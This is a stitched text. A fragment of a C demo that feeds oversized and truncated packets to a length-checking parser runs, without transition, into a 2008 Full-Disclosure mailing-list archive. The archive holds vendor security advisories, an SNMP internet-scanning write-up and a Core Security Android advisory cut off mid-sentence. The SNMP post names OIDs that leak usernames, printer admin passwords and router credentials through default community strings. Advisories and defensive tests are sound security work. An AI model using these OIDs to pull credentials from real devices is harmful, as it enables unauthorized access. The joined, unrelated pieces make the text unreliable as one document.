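    5, 0, 0, 0,  8, 0, 0, 0,  'h', 'e', 'l', 'l', 'o', 0, 0, 0 };
static const unsigned char EVIL_PKT[] = {          /* len = 0xffffffff */
    0xff, 0xff, 0xff, 0xff,  8, 0, 0, 0,  'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A' };
static const unsigned char SHORT_PKT[] = {         /* claims 8, carries 4 */
    5, 0, 0, 0,  8, 0, 0, 0,  'h', 'e', 'l', 'l' };

/* Small helpers so results can be checked by value. */
enum vb_status demo_status(const unsigned char *pkt, size_t n)
{
    char *s; size_t used;
    enum vb_status st = vb_read_string(pkt, n, &s, &used);
    free(s);
    return st;
}

int demo_string_is(const unsigned char *pkt, size_t n,
                   const char *expect, size_t expect_used)
{
    char *s; size_t used;
    int ok = vb_read_string(pkt, n, &s, &used) == VB_OK &&
             strcmp(s, expect) == 0 && used == expect_used;
    free(s);
    return ok;
}

int main(void)
{
    printf("good: %d  evil: %d  short: %d  (0=OK 1=TRUNCATED 2=BAD_LENGTH)\n",
           demo_status(GOOD_PKT, sizeof GOOD_PKT),
           demo_status(EVIL_PKT, sizeof EVIL_PKT),
           demo_status(SHORT_PKT, sizeof SHORT_PKT));
    printf("0x40000000 * 12 -> %lld, 10 * 12 -> %lld\n",
           vb_array_bytes(0x40000000u, 12u, 4096),
           vb_array_bytes(10u, 12u, 4096));
    return 0;
}
```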
From seth at airscanner.com Mon Mar 3 19:40:13 2008
From: seth at airscanner.com (Seth Fogie)
Date: Mon, 03 Mar 2008 14:40:13 -0500
Subject: [Full-disclosure] Airscanner Mobile Security Advisory #07122001: Eye-Fi Multiple Vulnerabilities
Message-ID: <47CC541D.1020705@airscanner.com>

Airscanner Mobile Security Advisory #07122001: Eye-Fi Solution Multiple Vulnerabilities

Product:      Eye-Fi 1.1.2
Platform:     NA
Requirements: NA
Credits:      Seth Fogie
              Airscanner Mobile Security
              http://www.airscanner.com
              December 20, 2007
Risk Level:   Medium - Spoofed image injection, redirection of uploaded content, remote DoS of Eye-Fi service.

Summary:
The Eye-Fi is an instant solution to add wireless upload capability to any digital camera that supports an SD card. In the version of software tested, the solution has numerous vulnerabilities that can allow unauthorized image uploads to a PC, remote altering of the destination folder, remote crashing of the Eye-Fi service, and more.

Details:
Details on this program and the vulnerabilities are located at:
http://www.informit.com/articles/article.aspx?p=1174944
http://www.informit.com/articles/article.aspx?p=1177111

Vendor Response:
Vendor has released updated software for both the Eye-Fi software package and the SD card (firmware update).

Copyright (c) 2008 Airscanner Corp. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of Airscanner Corp. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please contact Airscanner Corp. for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use on an AS IS condition. There are no warranties with regard to this information.
Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

From py at gentoo.org Mon Mar 3 21:42:05 2008
From: py at gentoo.org (Pierre-Yves Rofes)
Date: Mon, 03 Mar 2008 22:42:05 +0100
Subject: [Full-disclosure] [ GLSA 200803-04 ] Mantis: Cross-Site Scripting
Message-ID: <47CC70AD.1050405@gentoo.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                    Gentoo Linux Security Advisory           GLSA 200803-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Low
     Title: Mantis: Cross-Site Scripting
      Date: March 03, 2008
      Bugs: #203791
        ID: 200803-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A persistent Cross-Site Scripting vulnerability has been discovered in Mantis.

Background
==========

Mantis is a web-based bug tracking system.

Affected packages
=================

    -------------------------------------------------------------------
     Package            /  Vulnerable  /                    Unaffected
    -------------------------------------------------------------------
  1  www-apps/mantisbt      < 1.0.8-r1                      >= 1.0.8-r1

Description
===========

seiji reported that the filename for the uploaded file in bug_report.php is not properly sanitised before being stored.

Impact
======

A remote attacker could upload a file with a specially crafted filename to a bug report, resulting in the execution of arbitrary HTML and script code within the context of the user's browser. Note that this vulnerability is only exploitable by authenticated users.

Workaround
==========

There is no known workaround at this time.
Resolution
==========

All Mantis users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-apps/mantisbt-1.0.8-r1"

References
==========

  [ 1 ] CVE-2007-6611
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6611

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200803-04.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHzHCtuhJ+ozIKI5gRAnPeAJ4jT1zqcc/xxiGeF3pfMzi/yZznvgCgolXY
mo0mgPPgKLcwm2vE4h7kOKY=
=6gN6
-----END PGP SIGNATURE-----

From py at gentoo.org Mon Mar 3 21:48:59 2008
From: py at gentoo.org (Pierre-Yves Rofes)
Date: Mon, 03 Mar 2008 22:48:59 +0100
Subject: [Full-disclosure] [ GLSA 200803-05 ] SplitVT: Privilege escalation
Message-ID: <47CC724B.9070307@gentoo.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                    Gentoo Linux Security Advisory           GLSA 200803-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: SplitVT: Privilege escalation
      Date: March 03, 2008
      Bugs: #211240
        ID: 200803-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A vulnerability in SplitVT may allow local users to gain escalated privileges.

Background
==========

SplitVT is a program for splitting terminals into two shells.

Affected packages
=================

    -------------------------------------------------------------------
     Package            /  Vulnerable  /                    Unaffected
    -------------------------------------------------------------------
  1  app-misc/splitvt       < 1.6.6-r1                      >= 1.6.6-r1

Description
===========

Mike Ashton reported that SplitVT does not drop group privileges before executing the xprop utility.

Impact
======

A local attacker could exploit this vulnerability to gain the "utmp" group privileges.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All SplitVT users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-misc/splitvt-1.6.6-r1"

References
==========

  [ 1 ] CVE-2008-0162
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0162

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200803-05.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHzHJLuhJ+ozIKI5gRApfjAJ0SqPZ79ALH6HMJfGAzt65BH+9OFwCfVWco
bS6neubcIpIPKnzy7sOnjE0=
=KoEB
-----END PGP SIGNATURE-----

From py at gentoo.org Mon Mar 3 22:00:10 2008
From: py at gentoo.org (Pierre-Yves Rofes)
Date: Mon, 03 Mar 2008 23:00:10 +0100
Subject: [Full-disclosure] [ GLSA 200803-06 ] SWORD: Shell command injection
Message-ID: <47CC74EA.40401@gentoo.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                    Gentoo Linux Security Advisory           GLSA 200803-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: SWORD: Shell command injection
      Date: March 03, 2008
      Bugs: #210754
        ID: 200803-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Insufficient input checking in SWORD may allow shell command injection.

Background
==========

SWORD is a library for Bible study software.

Affected packages
=================

    -------------------------------------------------------------------
     Package            /  Vulnerable  /                    Unaffected
    -------------------------------------------------------------------
  1  app-text/sword         < 1.5.8-r2                      >= 1.5.8-r2

Description
===========

Dan Dennison reported that the diatheke.pl script used in SWORD does not properly sanitize shell meta-characters in the "range" parameter before processing it.

Impact
======

A remote attacker could provide specially crafted input to a vulnerable application, possibly resulting in the remote execution of arbitrary shell commands with the privileges of the user running SWORD (generally the web server account).

Workaround
==========

There is no known workaround at this time.
Resolution
==========

All SWORD users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-text/sword-1.5.8-r2"

References
==========

  [ 1 ] CVE-2008-0932
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0932

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200803-06.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHzHTpuhJ+ozIKI5gRAmOTAJ93/DdAiuRV8JbRq/phHYIzTomn4wCfYaJT
cEFjYtpok7uJPUNj8t52thY=
=h+WR
-----END PGP SIGNATURE-----

From skx at debian.org Mon Mar 3 21:14:41 2008
From: skx at debian.org (Steve Kemp)
Date: Mon, 3 Mar 2008 21:14:41 +0000
Subject: [Full-disclosure] [SECURITY] [DSA 1511-1] New libicu packages fix multiple problems
Message-ID: <20080303211441.GA5912@steve.org.uk>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1511-1                  security at debian.org
http://www.debian.org/security/                               Steve Kemp
March 03, 2008                        http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : libicu
Vulnerability  : various
Problem type   : local
Debian-specific: no
CVE Id(s)      : 2007-4770 2007-4771
Debian Bug     : 463688

Several local vulnerabilities have
been discovered in libicu, International Components for Unicode. The Common Vulnerabilities and Exposures project identifies the following problems:

CVE-2007-4770

    libicu in International Components for Unicode (ICU) 3.8.1 and earlier attempts to process backreferences to the nonexistent capture group zero (aka \0), which might allow context-dependent attackers to read from, or write to, out-of-bounds memory locations, related to corruption of REStackFrames.

CVE-2007-4771

    Heap-based buffer overflow in the doInterval function in regexcmp.cpp in libicu in International Components for Unicode (ICU) 3.8.1 and earlier allows context-dependent attackers to cause a denial of service (memory consumption) and possibly have unspecified other impact via a regular expression that writes a large amount of data to the backtracking stack.

For the stable distribution (etch), these problems have been fixed in version 3.6-2etch1.

For the unstable distribution (sid), these problems have been fixed in version 3.8-6.

We recommend that you upgrade your libicu package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.
Debian GNU/Linux 4.0 alias etch
- -------------------------------

These files will probably be moved into the stable distribution on its next update.
- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHzGoFwM/Gs81MDZ0RApgrAJ9Jd4cpLRAJ7WTQAnnpd8d4K3/mvwCeNusV
OLKQ6zeO2ePgNnldMI08TRU=
=ay/5
-----END PGP SIGNATURE-----

From py at gentoo.org Mon Mar 3 22:11:00 2008
From: py at gentoo.org (Pierre-Yves Rofes)
Date: Mon, 03 Mar 2008 23:11:00 +0100
Subject: [Full-disclosure] [ GLSA 200803-07 ] Paramiko: Information disclosure
Message-ID: <47CC7774.9090008@gentoo.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                    Gentoo Linux Security Advisory           GLSA 200803-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Low
     Title: Paramiko: Information disclosure
      Date: March 03, 2008
      Bugs: #205777
        ID: 200803-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Unsafe randomness usage in Paramiko may allow access to sensitive information.

Background
==========

Paramiko is a Secure Shell Server implementation written in Python.

Affected packages
=================

    -------------------------------------------------------------------
     Package            /  Vulnerable  /                    Unaffected
    -------------------------------------------------------------------
  1  dev-python/paramiko    < 1.7.2                         >= 1.7.2

Description
===========

Dwayne C. Litzenberger reported that the file "common.py" does not properly use RandomPool when using threads or forked processes.
Impact
======

A remote attacker could predict the values generated by applications using Paramiko for encryption purposes, potentially gaining access to sensitive information.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Paramiko users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-python/paramiko-1.7.2"

References
==========

  [ 1 ] CVE-2008-0299
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0299

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200803-07.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHzHd0uhJ+ozIKI5gRAg0QAJ43W26KJoUkLj/zCCTJk8hcMNCWWACdG2Bm
IO5CIH1vE/Ts0MrtKNEcbMI=
=YoSJ
-----END PGP SIGNATURE-----

From security at mandriva.com Mon Mar 3 21:57:37 2008
From: security at mandriva.com (security at mandriva.com)
Date: Mon, 03 Mar 2008 14:57:37 -0700
Subject: [Full-disclosure] [ MDVSA-2008:057 ] - Updated wireshark packages fix denial of service vulnerabilities
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2008:057
 http://www.mandriva.com/security/
_______________________________________________________________________

 Package : wireshark
 Date    : March 3, 2008
 Affected: 2007.0, 2007.1, 2008.0, Corporate 4.0
_______________________________________________________________________

 Problem Description:

 A few vulnerabilities were found in Wireshark that could cause it to crash or consume excessive memory under certain conditions. This update provides Wireshark 0.99.8, which is not vulnerable to the issues.
_______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1070
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1071
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1072
 http://www.wireshark.org/security/wnpa-sec-2008-01.html
_______________________________________________________________________

 Updated Packages:
_______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
_______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (GNU/Linux)

iD8DBQFHzEjrmqjQ0CJFipgRAvKzAKDq0ngyIBmNw/N9CMWTErMPKHkZHgCgrxf8
2qQSOFnaqHWoU3xidm0MKcE=
=+zG8
-----END PGP SIGNATURE-----

From security at vmware.com Mon Mar 3 22:10:58 2008
From: security at vmware.com (VMware Security team)
Date: Mon, 03 Mar 2008 14:10:58 -0800
Subject: [Full-disclosure] VMSA-2008-0004 Low: Updated e2fsprogs service console package
Message-ID: <47CC7772.8030509@vmware.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

- -------------------------------------------------------------------
                   VMware Security Advisory

Advisory ID:       VMSA-2008-0004
Synopsis:          Low: Updated e2fsprogs service console package
Issue date:        2008-03-03
Updated on:        2008-03-03 (initial release of advisory)
CVE numbers:       CVE-2007-5497
- -------------------------------------------------------------------

1.
Summary:

   Updated service console package e2fsprogs.

2. Relevant releases:

   ESX Server 2.5.5 Upgrade Patch 5
   ESX Server 2.5.4 Upgrade Patch 16

   NOTE: ESX 2.5.4 is in Extended Support and its end of support (Security and Bug fixes) is 10/08/2008. Users should plan to upgrade to at least 2.5.5 and preferably the newest release available before the end of extended support.

   ESX Server versions prior to 2.5.4 are no longer in Extended Support. Users should upgrade to a supported version of the product.

   The VMware Infrastructure Support Life Cycle Policy can be found here: http://www.vmware.com/support/policies/eos_vi.html

3. Problem description:

   The updated e2fsprogs package addresses multiple integer overflow flaws.

   Thanks to Rafal Wojtczuk of McAfee Avert Research for identifying and reporting this issue.

   The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2007-5497 to this issue.

4. Solution:

   Please review the Patch notes for your product and version and verify the md5sum of your downloaded file.

   ESX Server 2.x Patches:
   http://www.vmware.com/download/esx/esx2_patches.html

   ESX Server 2.5.5 Upgrade Patch 5
   http://download3.vmware.com/software/esx/esx-2.5.5-73417-upgrade.tar.gz
   md5sum: cf0addac42cb2057c47065971f56bee6
   http://www.vmware.com/support/esx25/doc/esx-255-200802-patch.html

   ESX Server 2.5.4 Upgrade Patch 16
   http://download3.vmware.com/software/esx/esx-2.5.4-73416-upgrade.tar.gz
   md5sum: b7b2cbfd45380124c128831dca8bc2b0
   http://www.vmware.com/support/esx25/doc/esx-254-200802-patch.html

5. References:

   CVE numbers
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5497

- -------------------------------------------------------------------

6.
Contact:

E-mail list for product security notifications and announcements:
http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

This Security Advisory is posted to the following lists:

  * security-announce at lists.vmware.com
  * bugtraq at securityfocus.com
  * full-disclosure at lists.grok.org.uk

E-mail: security at vmware.com

Security web site
http://www.vmware.com/security

VMware security response policy
http://www.vmware.com/support/policies/security_response.html

General support life cycle policy
http://www.vmware.com/support/policies/eos.html

VMware Infrastructure support life cycle policy
http://www.vmware.com/support/policies/eos_vi.html

Copyright 2008 VMware Inc. All rights reserved.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)

iD8DBQFHzHdoS2KysvBH1xkRCCxrAJsHDTczV7agRyav5nMXgVmvMKTsSACfTmLl
Rv1wQy510KaPTQy9LiNMTNo=
=yM44
-----END PGP SIGNATURE-----

From unknown.pentester at gmail.com Tue Mar 4 00:02:25 2008
From: unknown.pentester at gmail.com (Adrian P)
Date: Tue, 4 Mar 2008 00:02:25 +0000
Subject: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP!
Message-ID:

* Exploring the UNKNOWN: Scanning the Internet via SNMP! *
http://www.gnucitizen.org/blog/exploring-the-unknown-scanning-the-internet-via-snmp/

Hacking is not only about coming up with interesting solutions to problems, but also about exploring the unknown. It was this drive-for-knowledge philosophy that led to surveying a significant sample of the Internet, which allowed us to make some VERY interesting observations and get an idea of the current state of _remote SNMP hacking_.

* Why SNMP? *

2.5 million random IP addresses were surveyed via SNMP. Why SNMP, you might be asking? Well, there are several reasons. First of all, SNMP is a UDP-based protocol, which allows us to perform scanning in a much shorter time than via TCP-based protocols. Another advantage of UDP-based protocols is that the source IP address can be spoofed easily.
In the case of SNMP, it means that an attacker could change
configuration settings from a spoofed IP address provided that a valid
write community string is identified or cracked. Needless to say,
changing config settings via SNMP can lead to a full compromise.

Finally, we have been very involved [1] researching embedded devices
lately, and since a significant amount of Internet devices are hackable
via SNMP, such protocol was an obvious candidate.

* When SNMP read access is all we need for successful pwnage *

Gaining SNMP write access is of course usually considered to be a more
serious issue than gaining SNMP read access only. However, even if a
cracker only gained read access to a device/server via a SNMP community
string, sometimes it would be possible to extract sensitive information
such as usernames and passwords which would eventually lead to a
compromise of the targeted systems. In order to accomplish this, all
that is needed by the attacker is knowledge of an interesting OID to
query. My point is that SNMP read access could be enough to fully own a
device!

* Examples of juicy leaks via SNMP read access *

For instance, Windows servers return the full list of usernames [2] by
snmpwalking the OID 1.3.6.1.4.1.77.1.2.25. Or how about the BT Voyager
2000 router leaking the ISP credentials [3] including the password? Oh,
wait, I almost forgot to mention HP JetDirect printers leaking [4] the
admin password [5] via SNMP read access (using OIDs
.iso.3.6.1.4.1.11.2.3.9.4.2.1.3.9.1.1.0 and
.1.3.6.1.4.1.11.2.3.9.1.1.13.0). And of course the recently disclosed
[6] Dynamic DNS credentials disclosure on ZyXEL Prestige routers via the
OID 1.3.6.1.4.1.890.1.2.1.2.6.0 (see section 2.2 in the paper for more
details). You get the point: lots of devices leak _way too much
information_ via SNMP read access.

* The juicy survey stats! *

From a total number of 2.5 million random IP addresses, 5320 IP
addresses responded to the submitted SNMP requests.
Although this is only 0.2128% of all the IP addresses, we need to keep
in mind that most Internet systems with SNMP support correspond to
embedded devices, which only make up a small portion of the Internet.

One query was sent to each random IP using the community string
"public", which is often used as the default read community string. The
OID queried on each request is 1.3.6.1.2.1.1.1.0 which is the system
description (usually returns brand and model). The destination port used
was 161/UDP. Although some systems used different default port numbers
for SNMP daemons, 161 is definitely the most common one.

In order to protect the innocent, we hid the first two octets of the IP
addresses included in our results CSV file:

cat ./2dot5million-random-ips.csv | while read line
do
    echo -en '*.*.' >> ./2dot5million-random-ips.hidden.csv
    echo $line | cut -d "." -f 3- >> ./2dot5million-random-ips.hidden.csv
done

The most common systems found were the following:

* ARRIS Touchstone Telephony Modems [7] - these VoIP modems alone made
  up more than 35% of all found devices discovered!
* Cisco routers
* Apple AirPort [8] and Base Station
* ZyXEL Prestige routers
* Netopia routers
* Windows 2000 servers

Obviously, what kind of SNMP-enabled devices are the most popular on the
Internet is very interesting information from a research point of view.
For instance, if researching remote SNMP vulnerabilities, it would make
sense to focus on a type of device that is widely spread through the
Internet. I'll leave you guys to make your own observations by reading
the results CSV file.
The survey results file can be found on:
http://www.gnucitizen.org/blog/exploring-the-unknown-scanning-the-internet-via-snmp/

* References *

[1] http://www.google.com/search?num=100&hl=en&q=site%3Agnucitizen.org+%28embedded+devices%29+OR+upnp&btnG=Search
[2] http://insecure.org/sploits/NT.smnp.domain_users.record_deletion.html
[3] http://www.securityfocus.com/archive/1/366780
[4] http://www.phenoelit-us.org/stuff/HP_snmp.txt
[5] http://www.securityfocus.com/bid/7001/exploit
[6] http://www.procheckup.com/Hacking_ZyXEL_Gateways.pdf
[7] http://www.arrisi.com/products/touchstone/index.asp
[8] http://www.apple.com/airportexpress/

--
Adrian "pagvac" Pastor | gnucitizen.org

From krahmer at suse.de Tue Mar 4 08:53:55 2008
From: krahmer at suse.de (Sebastian Krahmer)
Date: Tue, 4 Mar 2008 09:53:55 +0100
Subject: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP!
In-Reply-To:
References:
Message-ID: <20080304085355.GA19264@suse.de>

On Tue, Mar 04, 2008 at 12:02:25AM +0000, Adrian P wrote:

> * Exploring the UNKNOWN: Scanning the Internet via SNMP! *
> http://www.gnucitizen.org/blog/exploring-the-unknown-scanning-the-internet-via-snmp/
>
> Hacking is not only about coming up with interesting solutions to
> problems, but also about exploring the unknown. It was this drive for
> knowledge philosophy that lead to surveying a significant sample of
> the Internet which allowed us to make some VERY interesting
> observations and get an idea of the current state of _remote SNMP
> hacking_.
>
> * Why SNMP? *
>
> 2.5 million random IP addresses were surveyed via SNMP. Why SNMP you
> might be asking? Well, there are several reasons. First of all SNMP is
> a UDP-based protocol which allows us to perform scanning at a much
> shorter time than via TCP-based protocols. Another advantage of

This is not true. I doubt there is any measurable advantage
of UDP vs. TCP scans if you do it right.
2.5 million addresses can be done in a very short coffee break.
Sebastian

--
~
~ perl self.pl
~ $_='print"\$_=\47$_\47;eval"';eval
~ krahmer at suse.de - SuSE Security Team
~ SUSE LINUX Products GmbH, GF: Markus Rex, HRB 16746 (AG Nuernberg)

From unknown.pentester at gmail.com Tue Mar 4 14:54:36 2008
From: unknown.pentester at gmail.com (Adrian P)
Date: Tue, 4 Mar 2008 14:54:36 +0000
Subject: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP!
In-Reply-To: <20080304085355.GA19264@suse.de>
References: <20080304085355.GA19264@suse.de>
Message-ID:

Well, such statement is simply derived from my personal experience of
doing application-layer UDP scanning. Never ran a proper benchmark to
compare speed results to be honest.

On Tue, Mar 4, 2008 at 8:53 AM, Sebastian Krahmer wrote:
> On Tue, Mar 04, 2008 at 12:02:25AM +0000, Adrian P wrote:
>
> > * Exploring the UNKNOWN: Scanning the Internet via SNMP! *
> > http://www.gnucitizen.org/blog/exploring-the-unknown-scanning-the-internet-via-snmp/
> >
> > Hacking is not only about coming up with interesting solutions to
> > problems, but also about exploring the unknown. It was this drive for
> > knowledge philosophy that lead to surveying a significant sample of
> > the Internet which allowed us to make some VERY interesting
> > observations and get an idea of the current state of _remote SNMP
> > hacking_.
> >
> > * Why SNMP? *
> >
> > 2.5 million random IP addresses were surveyed via SNMP. Why SNMP you
> > might be asking? Well, there are several reasons. First of all SNMP is
> > a UDP-based protocol which allows us to perform scanning at a much
> > shorter time than via TCP-based protocols. Another advantage of
> This is not true. I doubt there is any measurable advantage
> of UDP vs. TCP scans if you do it right.
> 2.5 million addresses can be done in a very short coffee break.
>
> Sebastian
>
>
> --
> ~
> ~ perl self.pl
> ~ $_='print"\$_=\47$_\47;eval"';eval
> ~ krahmer at suse.de - SuSE Security Team
> ~ SUSE LINUX Products GmbH, GF: Markus Rex, HRB 16746 (AG Nuernberg)
>
>

--
pagvac | gnucitizen.org

From pdp.gnucitizen at googlemail.com Tue Mar 4 17:07:56 2008
From: pdp.gnucitizen at googlemail.com (Petko D. Petkov)
Date: Tue, 4 Mar 2008 17:07:56 +0000
Subject: [Full-disclosure] like goolag but online
Message-ID: <6905b1570803040907x1b249006qf610765e6a25f4c6@mail.gmail.com>

cDc's goolag tool is pretty cool but here is an online alternative for
those of you who are interested:

http://www.gnucitizen.org/ghdb/

pdp

--
http://www.gnucitizen.org
http://www.gnucitizen.com
GNUCITIZEN

From advisories at coresecurity.com Tue Mar 4 18:26:56 2008
From: advisories at coresecurity.com (Core Security Technologies Advisories)
Date: Tue, 04 Mar 2008 16:26:56 -0200
Subject: [Full-disclosure] CORE-2008-0124: Multiple vulnerabilities in Google's Android SDK
Message-ID: <47CD9470.9040209@coresecurity.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs

Multiple vulnerabilities in Google's Android SDK

*Advisory Information*

Title: Multiple vulnerabilities in Google's Android SDK
Advisory ID: CORE-2008-0124
Advisory URL: http://www.coresecurity.com/?action=item&id=2148
Date published: 2008-03-04
Date of last update: 2008-03-04
Vendors contacted: Google
Release mode: Coordinated release

*Vulnerability Information*

Class: Heap overflow, integer overflow
Remotely Exploitable: No
Locally Exploitable: No
Bugtraq ID: 28006, 28005
CVE Name: CVE-2008-0986, CVE-2008-0985, CVE-2006-5793, CVE-2007-2445,
CVE-2007-5267, CVE-2007-5266, CVE-2007-5268, CVE-2007-5269

*Vulnerability Description*

Android is a project promoted primarily by Google through the Open
Handset Alliance aimed at providing a complete set of software for
mobile devices: an operating system, middleware and key mobile
applications [1]. Although the project is currently in a development
phase and has not made an official release yet, several vendors of
mobile chips have unveiled prototype phones built using development
releases of the platform at the Mobile World Congress [2]. Development
using the Android platform gained activity early in 2008 as a result of
Google's launch of the Android Development Challenge which includes $10
million USD in awards [3] for which a Software Development Kit (SDK) was
made available in November 2007.

The Android Software Development Kit includes a fully functional
